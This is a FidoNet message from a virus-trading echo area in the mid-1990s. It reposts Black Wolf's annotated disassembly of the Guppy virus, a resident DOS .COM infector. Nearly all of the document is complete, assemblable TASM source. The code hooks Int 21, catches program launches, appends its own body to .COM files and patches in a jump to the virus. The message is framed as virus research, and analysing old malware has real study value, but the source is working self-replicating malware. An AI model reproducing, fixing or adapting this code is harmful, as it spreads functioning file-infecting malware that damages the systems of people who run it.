;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 20 of 54
; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:13
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : GUPPY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39)
;* To   : Brad Frazee
;* Subj : GUPPY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
;***************************************************************************
;*                          The Guppy Virus                                *
;*                      Disassembly by Black Wolf                          *
;***************************************************************************
;*      The Guppy virus is a relatively simple, very small, resident .COM  *
;*infector.  It uses the standard way for a regular program to go resident *
;*(i.e. Int 27) which makes the infected program terminate the first time  *
;*run.  After that, however, infected files will run perfectly.  This virus*
;*uses interesting methods to restore the storage bytes, as well as a      *
;*strange technique to restore control to an infected file after it has    *
;*already gone memory resident.                                            *
;*                                                                         *
;*Note: The Guppy virus was originally assembled with an assembler other   *
;*      than Tasm, so to keep it exactly the same some commands must be    *
;*      entered directly as individual bytes.  In these cases, the command *
;*      is commented out and the bytes are found below it.                 *
;*                                                                         *
;***************************************************************************

.model tiny
.radix 16
.code

        org     100h
start:
        call    Get_Offset

Get_Offset:
        pop     si                 ;SI = offset of vir +
                       ;(Get_Offset-Start)
        mov     ax,3521h
        mov     bx,ax
        int     21h                ;Get Int 21 Address

        mov     ds:[si+Int_21_Offset-103],bx      ;Save old Int 21
        mov     ds:[si+Int_21_Segment-103],es

        ;mov     dx,si             ;Bytes vary between assemblers
        db      89,0f2

        ;add     dx,offset Int_21_Handler-104
        db      83,0c2,1f

        mov     ah,25h
        int     21h                ;Set Int 21

        inc     dh                 ;Add 100h bytes to go resident
                       ;from handler
        push    cs
        pop     es
        int     27h                ;Terminate & stay resident


Int_21_Handler:
        cmp     ax,4B00h           ;Is call a Load & Execute?
        je      Infect             ;Yes? Jump Infect

        cmp     al,21h             ;Might it be a residency check?
        jne     Go_Int_21          ;No? Restore control to Int 21

        ;cmp     ax,bx             ;Are AX and BX the same?
        db      39,0d8

        jne     Go_Int_21          ;No, Restore control to Int 21

        push    word ptr [si+3dh]  ;3dh = offset of Storage_Bytes -
                       ;Get_Offset

                       ;This gets the first word of
                       ;storage bytes, which is then
                       ;popped to CS:100 to restore it.

        mov     bx,offset ds:[100] ;100 = Beginning of COM
        pop     word ptr [bx]

        mov     cl,[si+3Fh]        ;Restore third storage byte.
        mov     [bx+2],cl

Restore_Control:
        pop     cx
        push    bx
        iret                            ;Jump back to Host program.

Storage_Bytes         db      0, 0, 0

Infect:
        push    ax
        push    bx
        push    dx
        push    ds
        mov     ax,3D02h
        int     21h             ;Open File for Read/Write Access

        xchg    ax,bx
        call    Get_Offset_Two

Get_Offset_Two:
        pop     si
        push    cs
        pop     ds
        mov     ah,3F
        mov     cx,3
        sub     si,10           ;Set SI=Storage_Bytes

        ;mov     dx,si
        db      89,0f2

        int     21h             ;Read first 3 bytes of file

        cmp     byte ptr [si],0E9h      ;Is the first command a jump?
        jne     Close_File                   ;No? Jump to Close_File
        mov     ax,4202h
        xor     dx,dx
        xor     cx,cx
        int     21h                     ;Go to end of file

        xchg    ax,di
        mov     ah,40h
        mov     cl,98h                  ;Virus Size

        ;mov     dx,si
        db      89,0f2

        sub     dx,40h                  ;Beginning of virus
        int     21h                     ;Append virus to new host

        mov     ax,4200h
        xor     cx,cx
        xor     dx,dx
        int     21h                     ;Go back to beginning of file

        mov     cl,3

        ;sub     di,cx
        db      29,0cf

        mov     [si+1],di
        mov     ah,40h

        ;mov     dx,si
        db      89,0f2

        int     21h                     ;Write 3 byte jump to file

Close_File:
        mov     ah,3Eh
        int     21h

        pop     ds
        pop     dx
        pop     bx
        pop     ax
Go_Int_21:
        db      0EAh                    ;Go On With Int 21
Int_21_Offset   dw      ?
Int_21_Segment  dw      ?

end     start

;-+-  UC2 Support France
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/d            Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)